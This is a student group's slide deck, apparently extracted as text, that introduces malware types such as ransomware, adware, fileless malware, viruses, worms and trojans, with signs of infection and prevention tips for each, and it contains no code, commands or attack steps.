MALWARE

ATTACKS

BY: GROUP 1
 01
WHAT IS MALWARE?

Malware is a common cyber-attack and an

umbrella term for various malicious programs
delivered and installed on end-user systems and
servers. These attacks are designed to cause harm
to a computer, server, or computer network, and
are used by cybercriminals to obtain data for
financial gain
 02
HISTORY OF MALWARE

Most computer historians say that the first virus was created in 1970. The Creeper
Worm self-replicated and copied itself across ARPANET (an early version of the
internet). When activated, it displayed the message, “I’m the creeper, catch me if you
can!”
The term “virus” wasn’t coined until 1986, when Ph.D. student Fred Cohen described a
computer virus as a program that can infect other programs and create an evolved
version of itself. Most early viruses destroyed files or infected boot sectors. Today’s
malware is much more sinister and designed to steal data, spy on businesses, create a
denial-of-service condition, or lock files to extort money from victims.
 03
WHAT IS THE INTENT OF MALWARE?

Cyber-attackers use malware for a variety of malicious intentions. In most cases, its purpose is
to steal critical information or resources for monetary gain. For instance, hackers use malware
as a tool to compromise computer networks or specific devices to steal or compromise
sensitive data, like credit card information or confidential login credentials. But in some
scenarios, malware is merely intended to cause havoc and sabotage its victims’ computer
systems to disrupt a system’s operability.
 04
WHY IS MALWARE USED?

Hacking is a business, and malware is one tool hackers use to steal data or control devices.
Cybercriminals use specific malware to perform certain functions. For example, ransomware
helps extort money from businesses, while Mirai is used to control IoT devices in a
distributed denial-of-service (DDoS) attack.
 05
WHY ATTACKERS USE MALWARE:

• Trick users into entering personally identifiable information (PII).

• Steal financial data such as credit card numbers or bank accounts.
• Give attackers remote access and control to devices.
• Use computer resources to mine Bitcoin or other cryptocurrencies.
 06
HOW DO YOU GET MALWARE?

A good antivirus stops malware from infecting a computer, so malware authors develop
several strategies to bypass cybersecurity installed on the network. A user can become a victim
of malware from numerous vectors.
 07
HERE ARE A FEW SIGNS THAT YOU MIGHT HAVE MALWARE

• SLOW COMPUTER
• CONSTANT POP-UPS
• BLUE SCREEN OF DEATH (BSOD)
• EXCESS DISK STORAGE OR LOSS
• UNKNOWN INTERNET
• CHANGE IN BROWSER SETTINGS
• ANTIVIRUS IS DISABLED
 08
HOW CAN I TELL IF I HAVE MALWARE?

Even though malware runs silently in the background, the resources it uses, and its payload
display are telltale signs your computer is infected. While some infection detection may require
an experienced user, you can still recognize specific signs to investigate further.
 09
TYPES OF MALWARE

• Ransomware
• Adware
• Fileless malware
• Viruses
• Worms
• Trojans
 10
RANSOMWARE

Ransomware is a type of malware that prevents or limits users from accessing their system,
either by locking the system's screen or by locking the users' files until a ransom is paid. More
modern ransomware families, collectively categorized as cryptoransomware, encrypt certain
file types on infected systems and force users to pay the ransom through certain online
payment methods to get a decryption key.
 11
EXAMPLE OF RANSOMWARE
HOW TO PREVENT? 12
•Never click on unsafe links: Avoid clicking on links in spam messages or on unknown websites. If you
click on malicious links, an automatic download could be started, which could lead to your computer
being infected.
•Avoid disclosing personal information: If you receive a call, text message, or email from an untrusted
source requesting personal information, do not reply. Cybercriminals who are planning a ransomware
attack might try to collect personal information in advance, which is then used to tailor phishing
messages specifically to you. If in any doubt as to whether the message is legitimate, contact the sender
directly.
•Do not open suspicious email attachments: Ransomware can also find its way to your device through
email attachments. Avoid opening any dubious-looking attachments. To make sure the email is
trustworthy, pay close attention to the sender and check that the address is correct. Never open
attachments that prompt you to run macros to view them. If the attachment is infected, opening it will
run a malicious macro that gives malware control of your computer.
•Never use unknown USB sticks: Never connect USB sticks or other storage media to your computer if
you do not know where they came from. Cybercriminals may have infected the storage medium and
placed it in a public place to entice somebody into using it.
HOW TO PREVENT? 13
•Keep your programs and operating system up to date: Regularly updating programs and operating
systems helps to protect you from malware. When performing updates, make sure you benefit from the
latest security patches. This makes it harder for cybercriminals to exploit vulnerabilities in your programs.
•Use only known download sources: To minimize the risk of downloading ransomware, never
download software or media files from unknown sites. Rely on verified and trustworthy sites for
downloads. Websites of this kind can be recognized by the trust seals. Make sure that the browser
address bar of the page you are visiting uses "https" instead of "http". A shield or lock symbol in the
address bar can also indicate that the page is secure. Also exercise caution when downloading anything
to your mobile device. You can trust the Google Play Store or the Apple App Store, depending on your
device.
•Use VPN services on public Wi-Fi networks: Conscientious use of public Wi-Fi networks is a sensible
protective measure against ransomware. When using a public Wi-Fi network, your computer is more
vulnerable to attacks. To stay protected, avoid using public Wi-Fi for sensitive transactions or use a secure
VPN service.
 14
ADWARE

Adware is a type of malicious software that secretly installs itself on your device and displays
unwanted advertisements and pop-ups. In some cases, adware can even track your online
behavior and display personalized ads. Adware is short for advertising supported software,
designed to throw advertisements up on your screen, most often within a web browser. Some
security professionals view it as the forerunner of the modern-day PUP (potentially unwanted
program).
 15
2 TYPES OF ADWARE

Legitimate adware
Legitimate adware is downloaded with the user's express consent. Users download this form
of adware knowingly and will usually get something in return. They may get a discount or free
software in exchange for receiving the adware. The ads help cover the cost of developing the
software or let the developer provide the product free.

For example, some software is offered either free, as an advertising-supported version, or as a

paid version without advertisements. Users wanting an ad-free experience can buy the paid
version.
 16
2 TYPES OF ADWARE

Malicious adware
Deceptive or abusive adware makes it difficult for the user to refuse consent or uses deceptive
means to gain the user's consent. For example, it may bombard the user with unwanted
advertisements or make it difficult to opt out of unwanted third-party software.
Adware is considered malicious only if it is designed with the intent of delivering malicious
software to the user. However, some legal adware may unintentionally create vulnerabilities
that malware can take advantage of.
 17
EXAMPLE 0F ADWARE
HOW TO PREVENT? 18

•Use antivirus software. The easiest way to block adware is to use

antivirus software that can detect malware before it infects the rest of your device. The
program will quarantine the adware in a virtual sandbox; we like to think of it as a timeout
for adware.
•Perform updates. Software updates may contain security patches, so update your
device as soon as you can.
•Only download apps from known app stores. The App Store and the Google Play Store
scan all apps for malware, but if you jailbreak your device, then you could be downloading
malicious apps. We like control as much as the next person, but when it comes to apps, it’s
best to stick to Apple’s and Google’s recommendations.
•Don’t click on pop-up ads. We all want flatter stomachs and whiter teeth, but resist
clicking on pop-up ads, as they could contain even more PUPs/PUAs.
•Beware of phishing. Phishing is sophisticated these days. Emails, links, and websites
may appear legitimate, but it’s best to check their legitimacy before clicking; we
recommend using a URL checker like Google’s Transparency Report.
 19
FILESS MALWARE

A fileless attack exploits existing software, applications, and protocols to perform malicious
activities. Threat actors use fileless attacks to gain control of targets without relying on
executable files as the first phase of the attack.
During fileless attacks, threat actors infiltrate, take control, and perform malicious activities by
exploiting vulnerable software that an end user might use daily, such as Microsoft Word or the
Chrome browser, or software already deployed on a server.
Threat actors also use vulnerabilities to gain access to native operating system tools like
PowerShell or any application that can allow a high level of access and privileges. These tools
enable actors to perform basic commands across a network.
Fileless attacks are becoming increasingly common because traditional antivirus (AV) tools are
not made to detect and prevent non-malware attacks. As a result, threat actors can use a
fileless attack as a point of entry that might go completely overlooked, unless more advanced
security tools are in place.
 20
2 TYPES OF FILESS MALWARE

Memory Code Injection

With memory code injection, the malicious code that powers fileless malware gets hidden
inside the memory of otherwise innocent applications. Often, the programs used for this kind
of attack are essential to important processes. Within these authorized processes, the malware
executes code.
In many cases, these kinds of attacks use vulnerabilities in programs, such as Flash and Java, as
well as browsers. It is also common for a hacker to use a phishing campaign to penetrate the
victim’s system. Once the malware has gained access, it executes code inside the target
computer's memory, not from within an app designed by the attacker.
 21
2 TYPES OF FILESS MALWARE

Windows Registry Manipulation

With Windows registry manipulation, the attacker uses a malicious link or file that takes
advantage of a trusted Windows process. After a user clicks on the link, for example, the
Windows process is then used to write and execute fileless code into the registry.
Similar to memory code injection malware, by manipulating the registry instead of working
through a malicious application, this kind of fileless malware can hide from traditional
detection tools, such as antivirus software.
 22
EXAMPLE 0F FILESS MALWARE
HOW TO PREVENT? 23

1.Keep Your System Updated: Ensure your operating system, antivirus software, and other applications are
updated regularly. Updates often include patches for security vulnerabilities.
2.Use Trusted Sources: Download software and files only from reputable sources. Avoid downloading from
unfamiliar websites or clicking on suspicious links in emails.
3.Enable Firewall: Activate your system's firewall to monitor incoming and outgoing traffic. Firewalls help block
unauthorized access to your computer.
4.Install Antivirus Software: Use reputable antivirus software and keep it updated. Antivirus programs can
detect and remove malware from your system.
5.Scan Downloads: Before opening or executing downloaded files, scan them with antivirus software to detect
any malicious content.
6.Be Cautious with Email Attachments: Exercise caution when opening email attachments, especially from
unknown senders. Malware often spreads through email attachments.
7.Enable Popup Blockers: Configure your web browser to block pop-ups, as they can be used to deliver
malware or phishing attempts.
 24
VIRUSES

A computer virus is a type of malware that attaches to another program (like a document),
which can replicatae and spread after a person first runs it on their system. For instance, you
could receive an email with a malicious attachment, open the file unknowingly, and then the
computer virus runs on your computer. Viruses are harmful and can destroy data, slow down
system resources, and log keystrokes.
COMMON SIGNS OF VIRUS 25

Speed of System
A computer system running slower than usual is one of the most common signs that the device
has a virus. This includes the system itself running slowly, as well as applications and internet
speed suffering. If a computer does not have powerful applications or programs installed and is
running slowly, then it may be a sign it is infected with a virus.
Pop-up Windows
Unwanted pop-up windows appearing on a computer or in a web browser are a telltale sign of
a computer virus. Unwanted pop-ups are a sign of malware, viruses, or spyware affecting a
device.
Programs Self-executing
If computer programs unexpectedly close by themselves, then it is highly likely that the
software has been infected with some form of virus or malware. Another indicator of a virus is
when applications fail to load when selected from the Start menu or their desktop icon. Every
time that happens, your next step should be to perform a virus scan and remove any files on
programs that might not be safe to use.
COMMON SIGNS OF VIRUS 26

Accounts Being Logged Out

Some viruses are designed to affect specific applications, which will either cause them to crash
or force the auser to automatically log out of the service.
Crashing of the Device
System crashes and the computer itself unexpectedly closing down are common indicators of a
virus. Computer viruses cause computers to act in a variety of strange ways, which may include
opening files by themselves, displaying unusual error messages, or clicking keys at random.
Mass Emails Being Sent from Your Email Account
Computer viruses are commonly spread via email. Hackers can use other people's email
accounts to spread malware and carry out wider cyberattacks. Therefore, if an email account
has sent emails in the outbox that a user did not send, then this could be a sign of a computer
virus.
Changes to Your Homepage
Any unexpected changes to a computer—such as your system’s homepage being amended or
any browser settings being updated—are signs that a computer virus may be present on the
device.
TYPES OF VIRUSES 27

Resident Virus
Viruses propagate themselves by infecting applications on a host computer. A resident virus
achieves this by infecting applications as they are opened by a user. A non-resident virus is
capable of infecting executable files when programs are not running.
Multipartite Virus
A multipartite virus uses multiple methods to infect and spread across computers. It will
typically remain in the computer’s memory to infect the hard disk, then spread through and
infect more drives by altering the content of applications. This results in performance lag and
application memory running low.
Multipartite viruses can be avoided by not opening attachments from untrusted sources and by
installing trusted antivirus software. It can also be prevented by cleaning the boot sector and
the computer’s entire disk.
Direct Action
A direct action virus accesses a computer’s main memory and infects all programs, files, and
folders located in the autoexec.bat path, before deleting itself. This virus typically alters the
performance of a system but is capable of destroying all data on the computer’s hard disk and
any USB device attached to it. Direct action viruses can be avoided through the use of antivirus
scanners. They are easy to detect, as is restoring infected files.
TYPES OF VIRUSES 28

Browser Hijacker
A browser hijacker manually changes the settings of web browsers, such as replacing the homepage, editing the
new tab page, and changing the default search engine. Technically, it is not a virus because it cannot infect files
but can be hugely damaging to computer users, who often will not be able to restore their homepage or search
engine. It can also contain adware that causes unwanted pop-ups and advertisements.
Browser hijackers typically attach to free software and malicious applications from unverified websites or app
stores, so only use trusted software and reliable antivirus software.
Overwrite Virus
Overwrite viruses are extremely dangerous. They can delete data and replace it with their own file content or
code. Once files get infected, they cannot be replaced, and the virus can affect Windows, DOS, Linux, and Apple
systems. The only way this virus can be removed is by deleting all of the files it has infected, which could be
devastating. The best way to protect against the overwrite virus is to use a trusted antivirus solution and keep it
updated.
Web Scripting Virus
A web scripting virus attacks web browser security, enabling a hacker to inject web-pages with malicious code,
or client-side scripting. This allows cyber criminals to attack major websites, such as social networking sites,
email providers, and any site that enables user input or reviews. Attackers can use the virus to send spam,
commit fraudulent activity, and damage server files.
Protecting against web scripting is reliant on deploying real-time web browser protection software, using cookie
security, disabling scripts, and using malicious software removal tools.
TYPES OF VIRUSES 29

File Infector
A file infector is one of the most common computer viruses. It overwrites files when they are
opened and can quickly spread across systems and networks. It largely affects files with .exe
or .com extensions. The best way to avoid file infector viruses is to only download official
software and deploy an antivirus solution.
Network Virus
Network viruses are extremely dangerous because they can completely cripple entire computer
networks. They are often difficult to discover, as the virus could be hidden within any computer
on an infected network. These viruses can easily replicate and spread by using the internet to
transfer to devices connected to the network. Trusted, robust antivirus solutions and advanced
firewalls are crucial to protecting against network viruses.
Boot Sector Virus
A boot sector virus targets a computer’s master boot record (MBR). The virus injects its code
into a hard disk’s partition table, then moves into the main memory when a computer restarts.
The presence of the virus is signified by boot-up problems, poor system performance, and the
hard disk becoming unable to locate. Most modern computers come with boot sector
safeguards that restrict the potential of this type of virus.
Steps to protecting against a boot sector virus include ensuring disks are write-protected and
not starting up a computer with untrusted external drives connected.
 30
EXAMPLE 0F VIRUS
 31
WORMS

A computer worm is a type of Trojan that is capable of propagating or replicating itself from
one system to another. It can do this in a number of ways. Unlike viruses, worms don’t need a
host file to latch onto. After arriving and executing on a target system, it can do a number of
malicious tasks, such as dropping other malware, copying itself onto devices physically
attached to the affected system, deleting files, and consuming bandwidth.
WORMS VS. TROJAN VS. VIRUS 32

Cybercriminals have many cyberattack methods at their disposal, and it can be easy to get them
confused. One common misconception is that computer worms are the same thing as viruses
or Trojan horses, but there are differences in the ways the attacks propagate themselves (or
don’t).

•Worms spread from computer to computer and can move and operate independently. A
worm’s ability to send out hundreds or thousands of copies of itself is one of its biggest
dangers.
•Viruses are almost always attached to an executable file and remain dormant until the victim
activates the attack, either by opening an infected application, downloading a corrupt file, or
clicking a link. Viruses cannot spread without human action.
•Trojan horses are a type of malware that disguise themselves as legitimate code. Attackers
can export files, modify data, and delete files on your device. Generally, Trojan horses do not
attempt to inject themselves into other files or otherwise propagate themselves.
TYPES OF WORMS 33
Email Worms As the name suggests, an email worm spreads via email. Also
known as a mass-mailer worm, an email worm distributes a copy
of itself as an email attachment or as a link to an infected file on a
compromised or hacker-owned website.
File-Sharing Worms File-sharing worms embed and disguise themselves as innocent
media files. When an unsuspecting user downloads the file, the
worm infects their device. Once the worm has compromised the
device, it can capture confidential information that the adversary
can use to their advantage or sell to other attackers.
IM Worms IM worms masquerade as attachments and links on social media
platforms, and they frequently include content that baits the
victim to click on the URL. Once it’s executed, the IM worm can
spread through an instant messaging network.
Cryptoworms A cryptoworm is a worm attack that encrypts data on the victim's
system and then demands a ransom payment to regain access to
the data.
IRC Worms An IRC worm is a malicious program designed to exploit IRC
channels to infect chat rooms and message forums by sending
infected messages.
P2P Worms P2P worms use the mechanisms of P2P networks to distribute
copies to unsuspecting P2P users.
HOW TO PREVENT WORMS? 34

Preventing worms, which are a type of malware that can spread independently across networks
and systems, requires a combination of proactive measures and best practices. Here's how you
can prevent worms:

1.Keep Your System Updated: Regularly update your operating system, software, and
applications with the latest security patches. Worms often exploit known vulnerabilities, and
updates can help mitigate these risks.
2.Use Firewalls: Enable and properly configure firewalls on your network and individual
devices. Firewalls help monitor and control incoming and outgoing network traffic, reducing the
risk of worm infections.
3.Install Antivirus Software: Use reputable antivirus software and keep it updated. Antivirus
programs can detect and remove worms and other types of malware from your system.
4.Enable Intrusion Detection and Prevention Systems (IDPS): Implement IDPS solutions to
monitor network traffic for suspicious activity and block potential worm attacks in real-time.
 35
EXAMPLE 0F WORMS
4
 36
TROJAN

A Trojan is sometimes called a Trojan virus or Trojan horse virus, but those terms are technically
incorrect. Unlike a virus or worm, Trojan malware cannot replicate itself or self-execute. It
requires specific and deliberate action from the user.
Trojans are malware, and like most forms of malware, Trojans are designed to damage files,
redirect internet traffic, monitor the user’s activity, steal sensitive data or set up backdoor access
points to the system. Trojans may delete, block, modify, leak or copy data, which can then be
sold back to the user for ransom or on the dark web.
HOW DO TROJANS WORK? 37

Unlike computer viruses, a Trojan horse cannot manifest by itself, so it needs a user to
download the server side of the application for it to work. This means the executable (.exe) file
should be implemented and the program installed for the Trojan to attack a device’s system.
A Trojan virus spreads through legitimate-looking emails and files attached to emails, which are
spammed to reach the inboxes of as many people as possible. When the email is opened and
the malicious attachment is downloaded, the Trojan server will install and automatically run
every time the infected device is turned on.
Devices can also be infected by a Trojan through social engineering tactics, which cyber
criminals use to coerce users into downloading a malicious application. The malicious file could
be hidden in banner advertisements, pop-up advertisements, or links on websites.
A computer infected by Trojan malware can also spread it to other computers. A cyber criminal
turns the device into a zombie computer, which means they have remote control of it without
the user knowing. Hackers can then use the zombie computer to continue sharing malware
across a network of devices, known as a botnet.
COMMON TYPES OF TROJAN 38

1.Backdoor Trojan: A backdoor Trojan enables an attacker to gain remote access to a computer and take
control of it using a backdoor. This enables the malicious actor to do whatever they want on the device, such as
deleting files, rebooting the computer, stealing data, or uploading malware. A backdoor Trojan is frequently
used to create a botnet through a network of zombie computers.
2.Banker Trojan: A banker Trojan is designed to target users’ banking accounts and financial information. It
attempts to steal account data for credit and debit cards, e-payment systems, and online banking systems.
3.Distributed denial-of-service (DDoS) Trojan: These Trojan programs carry out attacks that overload a
network with traffic. It will send multiple requests from a computer or a group of computers to overwhelm a
target web address and cause a denial of service.
4.Downloader Trojan: A downloader Trojan targets a computer that has already been infected by malware,
then downloads and installs more malicious programs to it. This could be additional Trojans or other
types of malware like adware.
5.Exploit Trojan: An exploit malware program contains code or data that takes advantage of specific
vulnerabilities within an application or computer system. The cyber criminal will target users through a method
like a phishing attack, then use the code in the program to exploit a known vulnerability.
6.Fake antivirus Trojan: A fake antivirus Trojan simulates the actions of legitimate antivirus software. The
Trojan is designed to detect and remove threats like a regular antivirus program, then extort money from users
for removing threats that may be nonexistent.
 39
EXAMPLE 0F TROJAN
HOW TO PREVENT TROJAN? 40

Preventing Trojan viruses involves a combination of proactive measures, security best practices,
and user education. Trojans are deceptive malware that masquerade as legitimate software or
files while carrying out malicious activities in the background. Here are some ways to prevent
Trojan virus infections:

1.Use Reputable Antivirus Software: Install reputable antivirus or anti-malware software on

your devices and keep it updated. Antivirus programs can detect and remove Trojan viruses
before they can cause harm.
2.Keep Your System Updated: Regularly update your operating system, software applications,
and security patches. Software updates often include fixes for security vulnerabilities that could
be exploited by Trojans.
3.Exercise Caution with Email Attachments: Be wary of email attachments, especially from
unknown or suspicious senders. Do not open attachments unless you're expecting them and
can verify the sender's authenticity. Consider using email filtering solutions to block suspicious
attachments.
4.Be Cautious of Suspicious Links: Avoid clicking on links in emails, instant messages, or social
media messages from unknown or untrustworthy sources. These links could lead to malicious
websites that distribute Trojan viruses.
 08

THANK YOU